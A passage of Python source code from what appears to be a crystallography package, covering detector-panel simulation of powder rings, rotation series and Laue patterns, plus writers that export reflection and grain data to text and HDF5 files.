notice we already clipped points to the panel!\n i_floor = cellIndices(self.row_pixel_vec, xy_clip[:, 1])\n i_floor_img = _fix_indices(i_floor, 0, self.rows - 1)\n\n j_floor = cellIndices(self.col_pixel_vec, xy_clip[:, 0])\n j_floor_img = _fix_indices(j_floor, 0, self.cols - 1)\n\n # ceilings from floors\n i_ceil = i_floor + 1\n i_ceil_img = _fix_indices(i_ceil, 0, self.rows - 1)\n\n j_ceil = j_floor + 1\n j_ceil_img = _fix_indices(j_ceil, 0, self.cols - 1)\n\n # first interpolate at top/bottom rows\n row_floor_int = \\\n (j_ceil - ij_frac[:, 1])*img[i_floor_img, j_floor_img] \\\n + (ij_frac[:, 1] - j_floor)*img[i_floor_img, j_ceil_img]\n row_ceil_int = \\\n (j_ceil - ij_frac[:, 1])*img[i_ceil_img, j_floor_img] \\\n + (ij_frac[:, 1] - j_floor)*img[i_ceil_img, j_ceil_img]\n\n # next interpolate across cols\n int_vals = \\\n (i_ceil - ij_frac[:, 0])*row_floor_int \\\n + (ij_frac[:, 0] - i_floor)*row_ceil_int\n int_xy[on_panel] = int_vals\n return int_xy\n\n def make_powder_rings(\n self, pd, merge_hkls=False, delta_tth=None,\n delta_eta=10., eta_period=None, eta_list=None,\n rmat_s=ct.identity_3x3, tvec_s=ct.zeros_3,\n tvec_c=ct.zeros_3, full_output=False):\n \"\"\"\n Generate points on Debye_Scherrer rings over the detector.\n\n !!! it is assuming that rmat_s is built from (chi, ome) as it the case\n for HEDM!\n\n Parameters\n ----------\n pd : TYPE\n DESCRIPTION.\n merge_hkls : TYPE, optional\n DESCRIPTION. The default is False.\n delta_tth : TYPE, optional\n DESCRIPTION. The default is None.\n delta_eta : TYPE, optional\n DESCRIPTION. The default is 10..\n eta_period : TYPE, optional\n DESCRIPTION. The default is None.\n eta_list : TYPE, optional\n DESCRIPTION. The default is None.\n rmat_s : TYPE, optional\n DESCRIPTION. The default is ct.identity_3x3.\n tvec_s : TYPE, optional\n DESCRIPTION. The default is ct.zeros_3.\n tvec_c : TYPE, optional\n DESCRIPTION. The default is ct.zeros_3.\n full_output : TYPE, optional\n DESCRIPTION. The default is False.\n\n Raises\n ------\n RuntimeError\n DESCRIPTION.\n\n Returns\n -------\n TYPE\n DESCRIPTION.\n\n \"\"\"\n # in case you want to give it tth angles directly\n if hasattr(pd, '__len__'):\n tth = np.array(pd).flatten()\n if delta_tth is None:\n raise RuntimeError(\n \"If supplying a 2theta list as first arg, \"\n + \"must supply a delta_tth\")\n sector_vertices = np.tile(\n 0.5*np.radians([-delta_tth, -delta_eta,\n -delta_tth, delta_eta,\n delta_tth, delta_eta,\n delta_tth, -delta_eta,\n 0.0, 0.0]), (len(tth), 1)\n )\n # Convert to radians as is done below\n del_eta = np.radians(delta_eta)\n else:\n # Okay, we have a PlaneData object\n try:\n pd = PlaneData.makeNew(pd) # make a copy to munge\n except(TypeError):\n # !!! 
have some other object here, likely a dummy plane data\n # object of some sort...\n pass\n\n if delta_tth is not None:\n pd.tThWidth = np.radians(delta_tth)\n else:\n delta_tth = np.degrees(pd.tThWidth)\n\n # conversions, meh...\n del_eta = np.radians(delta_eta)\n\n # do merging if asked\n if merge_hkls:\n _, tth_ranges = pd.getMergedRanges(cullDupl=True)\n tth = np.array([0.5*sum(i) for i in tth_ranges])\n else:\n tth_ranges = pd.getTThRanges()\n tth = pd.getTTh()\n tth_pm = tth_ranges - np.tile(tth, (2, 1)).T\n sector_vertices = np.vstack(\n [[i[0], -del_eta,\n i[0], del_eta,\n i[1], del_eta,\n i[1], -del_eta,\n 0.0, 0.0]\n for i in tth_pm])\n\n # for generating rings, make eta vector in correct period\n if eta_period is None:\n eta_period = (-np.pi, np.pi)\n\n if eta_list is None:\n neta = int(360./float(delta_eta))\n # this is the vector of ETA EDGES\n eta_edges = mapAngle(\n np.radians(\n delta_eta*np.linspace(0., neta, num=neta + 1)\n ) + eta_period[0],\n eta_period\n )\n\n # get eta bin centers from edges\n \"\"\"\n # !!! this way is probably overkill, since we have delta eta\n eta_centers = np.average(\n np.vstack([eta[:-1], eta[1:]),\n axis=0)\n \"\"\"\n # !!! should be safe as eta_edges are monotonic\n eta_centers = eta_edges[:-1] + 0.5*del_eta\n else:\n eta_centers = np.radians(eta_list).flatten()\n neta = len(eta_centers)\n eta_edges = (\n np.tile(eta_centers, (2, 1)) +\n np.tile(0.5*del_eta*np.r_[-1, 1], (neta, 1)).T\n ).T.flatten()\n\n # get chi and ome from rmat_s\n # ??? not needed chi = np.arctan2(rmat_s[2, 1], rmat_s[1, 1])\n ome = np.arctan2(rmat_s[0, 2], rmat_s[0, 0])\n\n # make list of angle tuples\n angs = [\n np.vstack(\n [i*np.ones(neta), eta_centers, ome*np.ones(neta)]\n ) for i in tth\n ]\n\n # need xy coords and pixel sizes\n valid_ang = []\n valid_xy = []\n map_indices = []\n npp = 5 # [ll, ul, ur, lr, center]\n for i_ring in range(len(angs)):\n # expand angles to patch vertices\n these_angs = angs[i_ring].T\n patch_vertices = (\n np.tile(these_angs[:, :2], (1, npp))\n + np.tile(sector_vertices[i_ring], (neta, 1))\n ).reshape(npp*neta, 2)\n\n # duplicate ome array\n ome_dupl = np.tile(\n these_angs[:, 2], (npp, 1)\n ).T.reshape(npp*neta, 1)\n\n # find vertices that all fall on the panel\n gVec_ring_l = anglesToGVec(\n np.hstack([patch_vertices, ome_dupl]),\n bHat_l=self.bvec)\n all_xy = gvecToDetectorXY(\n gVec_ring_l,\n self.rmat, rmat_s, ct.identity_3x3,\n self.tvec, tvec_s, tvec_c,\n beamVec=self.bvec)\n if self.distortion is not None:\n all_xy = self.distortion.apply_inverse(all_xy)\n\n _, on_panel = self.clip_to_panel(all_xy)\n\n # all vertices must be on...\n patch_is_on = np.all(on_panel.reshape(neta, npp), axis=1)\n patch_xys = all_xy.reshape(neta, 5, 2)[patch_is_on]\n\n # form output arrays\n valid_ang.append(these_angs[patch_is_on, :2])\n valid_xy.append(patch_xys[:, -1, :].squeeze())\n map_indices.append(patch_is_on)\n pass\n # ??? 
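# --- Illustrative sketch: eta bin edges and centers --------------------------
# When no explicit eta_list is given, the code above builds neta = 360/delta
# evenly spaced eta EDGES over the requested period and takes bin centers at
# edge + 0.5*delta (the real code additionally re-maps the edges into the
# period with mapAngle).  A coarse hypothetical delta of 90 degrees keeps the
# arrays small.
import numpy as np

delta_eta = 90.0                        # degrees, hypothetical
eta_period = (-np.pi, np.pi)
neta = int(360. / float(delta_eta))     # -> 4 azimuthal bins

eta_edges = np.radians(
    delta_eta * np.linspace(0., neta, num=neta + 1)
) + eta_period[0]
eta_centers = eta_edges[:-1] + 0.5 * np.radians(delta_eta)

print(np.degrees(eta_edges))     # [-180.  -90.    0.   90.  180.]
print(np.degrees(eta_centers))   # [-135.  -45.   45.  135.]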
is this option necessary?\n if full_output:\n return valid_ang, valid_xy, map_indices, eta_edges\n else:\n return valid_ang, valid_xy\n\n def map_to_plane(self, pts, rmat, tvec):\n \"\"\"\n Map detctor points to specified plane.\n\n Parameters\n ----------\n pts : TYPE\n DESCRIPTION.\n rmat : TYPE\n DESCRIPTION.\n tvec : TYPE\n DESCRIPTION.\n\n Returns\n -------\n TYPE\n DESCRIPTION.\n\n Notes\n -----\n by convention:\n\n n * (u*pts_l - tvec) = 0\n\n [pts]_l = rmat*[pts]_m + tvec\n\n \"\"\"\n # arg munging\n pts = np.atleast_2d(pts)\n npts = len(pts)\n\n # map plane normal & translation vector, LAB FRAME\n nvec_map_lab = rmat[:, 2].reshape(3, 1)\n tvec_map_lab = np.atleast_2d(tvec).reshape(3, 1)\n tvec_d_lab = np.atleast_2d(self.tvec).reshape(3, 1)\n\n # put pts as 3-d in panel CS and transform to 3-d lab coords\n pts_det = np.hstack([pts, np.zeros((npts, 1))])\n pts_lab = np.dot(self.rmat, pts_det.T) + tvec_d_lab\n\n # scaling along pts vectors to hit map plane\n u = np.dot(nvec_map_lab.T, tvec_map_lab) \\\n / np.dot(nvec_map_lab.T, pts_lab)\n\n # pts on map plane, in LAB FRAME\n pts_map_lab = np.tile(u, (3, 1)) * pts_lab\n\n return np.dot(rmat.T, pts_map_lab - tvec_map_lab)[:2, :].T\n\n def simulate_rotation_series(self, plane_data, grain_param_list,\n eta_ranges=[(-np.pi, np.pi), ],\n ome_ranges=[(-np.pi, np.pi), ],\n ome_period=(-np.pi, np.pi),\n chi=0., tVec_s=ct.zeros_3,\n wavelength=None):\n \"\"\"\n Simulate a monochromatic rotation series for a list of grains.\n\n Parameters\n ----------\n plane_data : TYPE\n DESCRIPTION.\n grain_param_list : TYPE\n DESCRIPTION.\n eta_ranges : TYPE, optional\n DESCRIPTION. The default is [(-np.pi, np.pi), ].\n ome_ranges : TYPE, optional\n DESCRIPTION. The default is [(-np.pi, np.pi), ].\n ome_period : TYPE, optional\n DESCRIPTION. The default is (-np.pi, np.pi).\n chi : TYPE, optional\n DESCRIPTION. The default is 0..\n tVec_s : TYPE, optional\n DESCRIPTION. The default is ct.zeros_3.\n wavelength : TYPE, optional\n DESCRIPTION. The default is None.\n\n Returns\n -------\n valid_ids : TYPE\n DESCRIPTION.\n valid_hkls : TYPE\n DESCRIPTION.\n valid_angs : TYPE\n DESCRIPTION.\n valid_xys : TYPE\n DESCRIPTION.\n ang_pixel_size : TYPE\n DESCRIPTION.\n\n \"\"\"\n # grab B-matrix from plane data\n bMat = plane_data.latVecOps['B']\n\n # reconcile wavelength\n # * added sanity check on exclusions here; possible to\n # * make some reflections invalid (NaN)\n if wavelength is None:\n wavelength = plane_data.wavelength\n else:\n if plane_data.wavelength != wavelength:\n plane_data.wavelength = ct.keVToAngstrom(wavelength)\n assert not np.any(np.isnan(plane_data.getTTh())),\\\n \"plane data exclusions incompatible with wavelength\"\n\n # vstacked G-vector id, h, k, l\n full_hkls = xrdutil._fetch_hkls_from_planedata(plane_data)\n\n \"\"\" LOOP OVER GRAINS \"\"\"\n valid_ids = []\n valid_hkls = []\n valid_angs = []\n valid_xys = []\n ang_pixel_size = []\n for gparm in grain_param_list:\n\n # make useful parameters\n rMat_c = makeRotMatOfExpMap(gparm[:3])\n tVec_c = gparm[3:6]\n vInv_s = gparm[6:]\n\n # All possible bragg conditions as vstacked [tth, eta, ome]\n # for each omega solution\n angList = np.vstack(\n oscillAnglesOfHKLs(\n full_hkls[:, 1:], chi,\n rMat_c, bMat, wavelength,\n vInv=vInv_s,\n )\n )\n\n # filter by eta and omega ranges\n # ??? 
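# --- Illustrative sketch: the map_to_plane scaling factor --------------------
# map_to_plane scales each lab-frame point p along its ray from the origin so
# that it lands on the target plane n.(x - t) = 0; solving n.(u*p - t) = 0
# gives u = (n.t)/(n.p).  The plane and point below are hypothetical.
import numpy as np

nvec = np.r_[0., 0., 1.]       # plane normal, lab frame
tvec = np.r_[0., 0., 5.]       # a point on the plane
p_lab = np.r_[1., 2., 10.]     # a detector point in lab coordinates

u = (nvec @ tvec) / (nvec @ p_lab)
p_on_plane = u * p_lab
print(u, p_on_plane, nvec @ (p_on_plane - tvec))   # 0.5 [0.5 1.  5. ] 0.0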
get eta range from detector?\n allAngs, allHKLs = xrdutil._filter_hkls_eta_ome(\n full_hkls, angList, eta_ranges, ome_ranges\n )\n allAngs[:, 2] = mapAngle(allAngs[:, 2], ome_period)\n\n # find points that fall on the panel\n det_xy, rMat_s, on_plane = xrdutil._project_on_detector_plane(\n allAngs,\n self.rmat, rMat_c, chi,\n self.tvec, tVec_c, tVec_s,\n self.distortion)\n xys_p, on_panel = self.clip_to_panel(det_xy)\n valid_xys.append(xys_p)\n\n # filter angs and hkls that are on the detector plane\n # !!! check this -- seems unnecessary but the results of\n # _project_on_detector_plane() can have len < the input.\n # the output of _project_on_detector_plane has been modified to\n # hand back the index array to remedy this JVB 2020-05-27\n filtered_angs = np.atleast_2d(allAngs[on_plane, :])\n filtered_hkls = np.atleast_2d(allHKLs[on_plane, :])\n\n # grab hkls and gvec ids for this panel\n valid_hkls.append(filtered_hkls[on_panel, 1:])\n valid_ids.append(filtered_hkls[on_panel, 0])\n\n # reflection angles (voxel centers) and pixel size in (tth, eta)\n valid_angs.append(filtered_angs[on_panel, :])\n ang_pixel_size.append(self.angularPixelSize(xys_p))\n return valid_ids, valid_hkls, valid_angs, valid_xys, ang_pixel_size\n\n def simulate_laue_pattern(self, crystal_data,\n minEnergy=5., maxEnergy=35.,\n rmat_s=None, tvec_s=None,\n grain_params=None,\n beam_vec=None):\n \"\"\"\n \"\"\"\n if isinstance(crystal_data, PlaneData):\n\n plane_data = crystal_data\n\n # grab the expanded list of hkls from plane_data\n hkls = np.hstack(plane_data.getSymHKLs())\n\n # and the unit plane normals (G-vectors) in CRYSTAL FRAME\n gvec_c = np.dot(plane_data.latVecOps['B'], hkls)\n elif len(crystal_data) == 2:\n # !!! should clean this up\n hkls = np.array(crystal_data[0])\n bmat = crystal_data[1]\n gvec_c = np.dot(bmat, hkls)\n else:\n raise(RuntimeError, 'argument list not understood')\n nhkls_tot = hkls.shape[1]\n\n # parse energy ranges\n # TODO: allow for spectrum parsing\n multipleEnergyRanges = False\n if hasattr(maxEnergy, '__len__'):\n assert len(maxEnergy) == len(minEnergy), \\\n 'energy cutoff ranges must have the same length'\n multipleEnergyRanges = True\n lmin = []\n lmax = []\n for i in range(len(maxEnergy)):\n lmin.append(ct.keVToAngstrom(maxEnergy[i]))\n lmax.append(ct.keVToAngstrom(minEnergy[i]))\n else:\n lmin = ct.keVToAngstrom(maxEnergy)\n lmax = ct.keVToAngstrom(minEnergy)\n\n # parse grain parameters kwarg\n if grain_params is None:\n grain_params = np.atleast_2d(\n np.hstack([np.zeros(6), ct.identity_6x1])\n )\n n_grains = len(grain_params)\n\n # sample rotation\n if rmat_s is None:\n rmat_s = ct.identity_3x3\n\n # dummy translation vector... 
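# --- Illustrative sketch: energy cutoffs to wavelength cutoffs ---------------
# simulate_laue_pattern converts its keV cutoffs to wavelengths.  Because
# wavelength falls as energy rises (lambda[A] ~ 12.398 / E[keV]), the minimum
# wavelength comes from maxEnergy and the maximum wavelength from minEnergy,
# exactly as in the lmin/lmax assignments above.  keV_to_angstrom is a simple
# stand-in for ct.keVToAngstrom.
def keV_to_angstrom(energy_keV):
    return 12.39842 / energy_keV    # hc in keV*Angstrom (approximate)

min_energy, max_energy = 5., 35.    # keV, the defaults above
lmin = keV_to_angstrom(max_energy)  # ~0.354 Angstrom
lmax = keV_to_angstrom(min_energy)  # ~2.480 Angstrom
print(lmin, lmax)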
make input\n if tvec_s is None:\n tvec_s = ct.zeros_3\n\n # beam vector\n if beam_vec is None:\n beam_vec = ct.beam_vec\n\n # =========================================================================\n # LOOP OVER GRAINS\n # =========================================================================\n\n # pre-allocate output arrays\n xy_det = np.nan*np.ones((n_grains, nhkls_tot, 2))\n hkls_in = np.nan*np.ones((n_grains, 3, nhkls_tot))\n angles = np.nan*np.ones((n_grains, nhkls_tot, 2))\n dspacing = np.nan*np.ones((n_grains, nhkls_tot))\n energy = np.nan*np.ones((n_grains, nhkls_tot))\n for iG, gp in enumerate(grain_params):\n rmat_c = makeRotMatOfExpMap(gp[:3])\n tvec_c = gp[3:6].reshape(3, 1)\n vInv_s = mutil.vecMVToSymm(gp[6:].reshape(6, 1))\n\n # stretch them: V^(-1) * R * Gc\n gvec_s_str = np.dot(vInv_s, np.dot(rmat_c, gvec_c))\n ghat_c_str = mutil.unitVector(np.dot(rmat_c.T, gvec_s_str))\n\n # project\n dpts = gvecToDetectorXY(ghat_c_str.T,\n self.rmat, rmat_s, rmat_c,\n self.tvec, tvec_s, tvec_c,\n beamVec=beam_vec)\n\n # check intersections with detector plane\n canIntersect = ~np.isnan(dpts[:, 0])\n npts_in = sum(canIntersect)\n\n if np.any(canIntersect):\n dpts = dpts[canIntersect, :].reshape(npts_in, 2)\n dhkl = hkls[:, canIntersect].reshape(3, npts_in)\n\n # back to angles\n tth_eta, gvec_l = detectorXYToGvec(\n dpts,\n self.rmat, rmat_s,\n self.tvec, tvec_s, tvec_c,\n beamVec=beam_vec)\n tth_eta = np.vstack(tth_eta).T\n\n # warp measured points\n if self.distortion is not None:\n dpts = self.distortion.apply_inverse(dpts)\n\n # plane spacings and energies\n dsp = 1. / rowNorm(gvec_s_str[:, canIntersect].T)\n wlen = 2*dsp*np.sin(0.5*tth_eta[:, 0])\n\n # clip to detector panel\n _, on_panel = self.clip_to_panel(dpts, buffer_edges=True)\n\n if multipleEnergyRanges:\n validEnergy = np.zeros(len(wlen), dtype=bool)\n for i in range(len(lmin)):\n in_energy_range = np.logical_and(\n wlen >= lmin[i],\n wlen <= lmax[i])\n validEnergy = validEnergy | in_energy_range\n pass\n else:\n validEnergy = np.logical_and(wlen >= lmin, wlen <= lmax)\n pass\n\n # index for valid reflections\n keepers = np.where(np.logical_and(on_panel, validEnergy))[0]\n\n # assign output arrays\n xy_det[iG][keepers, :] = dpts[keepers, :]\n hkls_in[iG][:, keepers] = dhkl[:, keepers]\n angles[iG][keepers, :] = tth_eta[keepers, :]\n dspacing[iG, keepers] = dsp[keepers]\n energy[iG, keepers] = ct.keVToAngstrom(wlen[keepers])\n pass # close conditional on valids\n pass # close loop on grains\n return xy_det, hkls_in, angles, dspacing, energy\n\n\n# =============================================================================\n# UTILITIES\n# =============================================================================\n\n\nclass PatchDataWriter(object):\n \"\"\"Class for dumping Bragg reflection data.\"\"\"\n\n def __init__(self, filename):\n self._delim = ' '\n header_items = (\n '# ID', 'PID',\n 'H', 'K', 'L',\n 'sum(int)', 'max(int)',\n 'pred tth', 'pred eta', 'pred ome',\n 'meas tth', 'meas eta', 'meas ome',\n 'pred X', 'pred Y',\n 'meas X', 'meas Y'\n )\n self._header = self._delim.join([\n self._delim.join(np.tile('{:<6}', 5)).format(*header_items[:5]),\n self._delim.join(np.tile('{:<12}', 2)).format(*header_items[5:7]),\n self._delim.join(np.tile('{:<23}', 10)).format(*header_items[7:17])\n ])\n if isinstance(filename, IOBase):\n self.fid = filename\n else:\n self.fid = open(filename, 'w')\n print(self._header, file=self.fid)\n\n def __del__(self):\n self.close()\n\n def close(self):\n self.fid.close()\n\n def 
dump_patch(self, peak_id, hkl_id,\n hkl, spot_int, max_int,\n pangs, mangs, pxy, mxy):\n \"\"\"\n !!! maybe need to check that last four inputs are arrays\n \"\"\"\n if mangs is None:\n spot_int = np.nan\n max_int = np.nan\n mangs = np.nan*np.ones(3)\n mxy = np.nan*np.ones(2)\n\n res = [int(peak_id), int(hkl_id)] \\\n + np.array(hkl, dtype=int).tolist() \\\n + [spot_int, max_int] \\\n + pangs.tolist() \\\n + mangs.tolist() \\\n + pxy.tolist() \\\n + mxy.tolist()\n\n output_str = self._delim.join(\n [self._delim.join(np.tile('{:<6d}', 5)).format(*res[:5]),\n self._delim.join(np.tile('{:<12e}', 2)).format(*res[5:7]),\n self._delim.join(np.tile('{:<23.16e}', 10)).format(*res[7:])]\n )\n print(output_str, file=self.fid)\n return output_str\n\n\nclass GrainDataWriter(object):\n \"\"\"Class for dumping grain data.\"\"\"\n\n def __init__(self, filename=None, array=None):\n \"\"\"Writes to either file or np array\n\n Array must be initialized with number of rows to be written.\n \"\"\"\n if filename is None and array is None:\n raise RuntimeError(\n 'GrainDataWriter must be specified with filename or array')\n\n self.array = None\n self.fid = None\n\n # array supersedes filename\n if array is not None:\n assert array.shape[1] == 21, \\\n f'grain data table must have 21 columns not {array.shape[21]}'\n self.array = array\n self._array_row = 0\n return\n\n self._delim = ' '\n header_items = (\n '# grain ID', 'completeness', 'chi^2',\n 'exp_map_c[0]', 'exp_map_c[1]', 'exp_map_c[2]',\n 't_vec_c[0]', 't_vec_c[1]', 't_vec_c[2]',\n 'inv(V_s)[0,0]', 'inv(V_s)[1,1]', 'inv(V_s)[2,2]',\n 'inv(V_s)[1,2]*sqrt(2)',\n 'inv(V_s)[0,2]*sqrt(2)',\n 'inv(V_s)[0,1]*sqrt(2)',\n 'ln(V_s)[0,0]', 'ln(V_s)[1,1]', 'ln(V_s)[2,2]',\n 'ln(V_s)[1,2]', 'ln(V_s)[0,2]', 'ln(V_s)[0,1]'\n )\n self._header = self._delim.join(\n [self._delim.join(\n np.tile('{:<12}', 3)\n ).format(*header_items[:3]),\n self._delim.join(\n np.tile('{:<23}', len(header_items) - 3)\n ).format(*header_items[3:])]\n )\n if isinstance(filename, IOBase):\n self.fid = filename\n else:\n self.fid = open(filename, 'w')\n print(self._header, file=self.fid)\n\n def __del__(self):\n self.close()\n\n def close(self):\n if self.fid is not None:\n self.fid.close()\n\n def dump_grain(self, grain_id, completeness, chisq,\n grain_params):\n assert len(grain_params) == 12, \\\n \"len(grain_params) must be 12, not %d\" % len(grain_params)\n\n # extract strain\n emat = logm(np.linalg.inv(mutil.vecMVToSymm(grain_params[6:])))\n evec = mutil.symmToVecMV(emat, scale=False)\n\n res = [int(grain_id), completeness, chisq] \\\n + grain_params.tolist() \\\n + evec.tolist()\n\n if self.array is not None:\n row = self._array_row\n assert row < self.array.shape[0], \\\n f'invalid row {row} in array table'\n self.array[row] = res\n self._array_row += 1\n return res\n\n # (else) format and write to file\n output_str = self._delim.join(\n [self._delim.join(\n ['{:<12d}', '{:<12f}', '{:<12e}']\n ).format(*res[:3]),\n self._delim.join(\n np.tile('{:<23.16e}', len(res) - 3)\n ).format(*res[3:])]\n )\n print(output_str, file=self.fid)\n return output_str\n\n\nclass GrainDataWriter_h5(object):\n \"\"\"Class for dumping grain results to an HDF5 archive.\n\n TODO: add material spec\n \"\"\"\n\n def __init__(self, filename, instr_cfg, grain_params, use_attr=False):\n if isinstance(filename, h5py.File):\n self.fid = filename\n else:\n self.fid = h5py.File(filename + \".hdf5\", \"w\")\n icfg = dict(instr_cfg)\n\n # add instrument groups and attributes\n self.instr_grp = 
self.fid.create_group('instrument')\n unwrap_dict_to_h5(self.instr_grp, icfg, asattr=use_attr)\n\n # add grain group\n self.grain_grp = self.fid.create_group('grain')\n rmat_c = makeRotMatOfExpMap(grain_params[:3])\n tvec_c = np.array(grain_params[3:6]).flatten()\n vinv_s = np.array(grain_params[6:]).flatten()\n vmat_s = np.linalg.inv(mutil.vecMVToSymm(vinv_s))\n\n if use_attr: # attribute version\n self.grain_grp.attrs.create('rmat_c', rmat_c)\n self.grain_grp.attrs.create('tvec_c', tvec_c)\n self.grain_grp.attrs.create('inv(V)_s', vinv_s)\n self.grain_grp.attrs.create('vmat_s', vmat_s)\n else: # dataset version\n self.grain_grp.create_dataset('rmat_c', data=rmat_c)\n self.grain_grp.create_dataset('tvec_c', data=tvec_c)\n self.grain_grp.create_dataset('inv(V)_s', data=vinv_s)\n self.grain_grp.create_dataset('vmat_s', data=vmat_s)\n\n data_key = 'reflection_data'\n self.data_grp = self.fid.create_group(data_key)\n\n for det_key in self.instr_grp['detectors'].keys():\n self.data_grp.create_group(det_key)\n\n # FIXME: throws exception when called after close method\n # def __del__(self):\n # self.close()\n\n def close(self):\n self.fid.close()\n\n def dump_patch(self, panel_id,\n i_refl, peak_id, hkl_id, hkl,\n tth_edges, eta_edges, ome_centers,\n xy_centers, ijs, frame_indices,\n spot_data, pangs, pxy, mangs, mxy, gzip=1):\n \"\"\"\n to be called inside loop over patches\n\n default GZIP level for data arrays is 1\n \"\"\"\n fi = np.array(frame_indices, dtype=int)\n\n panel_grp = self.data_grp[panel_id]\n spot_grp = panel_grp.create_group(\"spot_%05d\" % i_refl)\n spot_grp.attrs.create('peak_id', int(peak_id))\n spot_grp.attrs.create('hkl_id', int(hkl_id))\n spot_grp.attrs.create('hkl', np.array(hkl, dtype=int))\n spot_grp.attrs.create('predicted_angles', pangs)\n spot_grp.attrs.create('predicted_xy', pxy)\n if mangs is None:\n mangs = np.nan*np.ones(3)\n spot_grp.attrs.create('measured_angles', mangs)\n if mxy is None:\n mxy = np.nan*np.ones(3)\n spot_grp.attrs.create('measured_xy', mxy)\n\n # get centers crds from edge arrays\n # FIXME: export full coordinate arrays, or just center vectors???\n #\n # ome_crd, eta_crd, tth_crd = np.meshgrid(\n # ome_centers,\n # centers_of_edge_vec(eta_edges),\n # centers_of_edge_vec(tth_edges),\n # indexing='ij')\n #\n # ome_dim, eta_dim, tth_dim = spot_data.shape\n\n # !!! 
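# --- Illustrative sketch: 6-vector to symmetric 3x3 matrix -------------------
# The grain output above stores inv(V_s) as six numbers whose off-diagonal
# entries carry a sqrt(2) factor (a Mandel-type convention), as spelled out in
# the GrainDataWriter column headers: [A00, A11, A22, sqrt(2)*A12,
# sqrt(2)*A02, sqrt(2)*A01].  The helper below only illustrates that layout;
# it is not guaranteed to reproduce mutil.vecMVToSymm exactly.
import numpy as np

def vec6_to_symm(v):
    s = 1.0 / np.sqrt(2.0)
    return np.array([
        [v[0],    s*v[5],  s*v[4]],
        [s*v[5],  v[1],    s*v[3]],
        [s*v[4],  s*v[3],  v[2]],
    ])

vinv_s = np.array([1., 1., 1., 0., 0., 0.])   # identity -> unstrained grain
print(vec6_to_symm(vinv_s))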
for now just exporting center vectors for spot_data\n tth_crd = centers_of_edge_vec(tth_edges)\n eta_crd = centers_of_edge_vec(eta_edges)\n\n shuffle_data = True # reduces size by 20%\n spot_grp.create_dataset('tth_crd', data=tth_crd,\n compression=\"gzip\", compression_opts=gzip,\n shuffle=shuffle_data)\n spot_grp.create_dataset('eta_crd', data=eta_crd,\n compression=\"gzip\", compression_opts=gzip,\n shuffle=shuffle_data)\n spot_grp.create_dataset('ome_crd', data=ome_centers,\n compression=\"gzip\", compression_opts=gzip,\n shuffle=shuffle_data)\n spot_grp.create_dataset('xy_centers', data=xy_centers,\n compression=\"gzip\", compression_opts=gzip,\n shuffle=shuffle_data)\n spot_grp.create_dataset('ij_centers', data=ijs,\n compression=\"gzip\", compression_opts=gzip,\n shuffle=shuffle_data)\n spot_grp.create_dataset('frame_indices', data=fi,\n compression=\"gzip\", compression_opts=gzip,\n shuffle=shuffle_data)\n spot_grp.create_dataset('intensities', data=spot_data,\n compression=\"gzip\", compression_opts=gzip,\n shuffle=shuffle_data)\n return\n\n\ndef unwrap_dict_to_h5(grp, d, asattr=False):\n \"\"\"\n Unwraps a dictionary to an HDF5 file of the same structure.\n\n Parameters\n ----------\n grp : HDF5 group object\n The HDF5 group to recursively unwrap the dict into.\n d : dict\n Input dict (of dicts).\n asattr : bool, optional\n Flag to write end member in dictionary tree to an attribute. If False,\n if writes the object to a dataset using numpy. The default is False.\n\n Returns\n -------\n None.\n\n \"\"\"\n while len(d) > 0:\n key, item = d.popitem()\n if isinstance(item, dict):\n subgrp = grp.create_group(key)\n unwrap_dict_to_h5(subgrp, item, asattr=asattr)\n else:\n if asattr:\n grp.attrs.create(key, item)\n else:\n try:\n grp.create_dataset(key, data=np.atleast_1d(item))\n except(TypeError):\n # probably a string badness\n grp.create_dataset(key, data=item)\n\n\ndef unwrap_h5_to_dict(f, d):\n \"\"\"\n Unwraps a simple HDF5 file to a dictionary of the same structure.\n\n Parameters\n ----------\n f : HDF5 file (mode r)\n The input HDF5 file object.\n d : dict\n dictionary object to update.\n\n Returns\n -------\n None.\n\n Notes\n -----\n As written, ignores attributes and uses numpy to cast HDF5 datasets to\n dict entries. 
Checks for 'O' type arrays and casts to strings; also\n converts single-element arrays to scalars.\n \"\"\"\n for key, val in f.items():\n try:\n d[key] = {}\n unwrap_h5_to_dict(val, d[key])\n except(AttributeError):\n # reached a dataset\n if np.dtype(val) == 'O':\n d[key] = h5py_read_string(val)\n else:\n tmp = np.array(val)\n if tmp.ndim == 1 and len(tmp) == 1:\n d[key] = tmp[0]\n else:\n d[key] = tmp\n\n\nclass GenerateEtaOmeMaps(object):\n \"\"\"\n eta-ome map class derived from new image_series and YAML config\n\n ...for now...\n\n must provide:\n\n self.dataStore\n self.planeData\n self.iHKLList\n self.etaEdges # IN RADIANS\n self.omeEdges # IN RADIANS\n self.etas # IN RADIANS\n self.omegas # IN RADIANS\n\n \"\"\"\n\n def __init__(self, image_series_dict, instrument, plane_data,\n active_hkls=None, eta_step=0.25, threshold=None,\n ome_period=(0, 360)):\n \"\"\"\n image_series must be OmegaImageSeries class\n instrument_params must be a dict (loaded from yaml spec)\n active_hkls must be a list (required for now)\n \"\"\"\n\n self._planeData = plane_data\n\n # ???: change name of iHKLList?\n # ???: can we change the behavior of iHKLList?\n if active_hkls is None:\n n_rings = len(plane_data.getTTh())\n self._iHKLList = range(n_rings)\n else:\n self._iHKLList = active_hkls\n n_rings = len(active_hkls)\n\n # ???: need to pass a threshold?\n eta_mapping, etas = instrument.extract_polar_maps(\n plane_data, image_series_dict,\n active_hkls=active_hkls, threshold=threshold,\n tth_tol=None, eta_tol=eta_step)\n\n # grab a det key\n # WARNING: this process assumes that the imageseries for all panels\n # have the same length and omegas\n det_key = list(eta_mapping.keys())[0]\n data_store = []\n for i_ring in range(n_rings):\n full_map = np.zeros_like(eta_mapping[det_key][i_ring])\n nan_mask_full = np.zeros(\n (len(eta_mapping), full_map.shape[0], full_map.shape[1])\n )\n i_p = 0\n for det_key, eta_map in eta_mapping.items():\n nan_mask = ~np.isnan(eta_map[i_ring])\n nan_mask_full[i_p] = nan_mask\n full_map[nan_mask] += eta_map[i_ring][nan_mask]\n i_p += 1\n re_nan_these = np.sum(nan_mask_full, axis=0) == 0\n full_map[re_nan_these] = np.nan\n data_store.append(full_map)\n self._dataStore = data_store\n\n # handle omegas\n omegas_array = image_series_dict[det_key].metadata['omega']\n self._omegas = mapAngle(\n np.radians(np.average(omegas_array, axis=1)),\n np.radians(ome_period)\n )\n self._omeEdges = mapAngle(\n np.radians(np.r_[omegas_array[:, 0], omegas_array[-1, 1]]),\n np.radians(ome_period)\n )\n\n # !!! must avoid the case where omeEdges[0] = omeEdges[-1] for the\n # indexer to work properly\n if abs(self._omeEdges[0] - 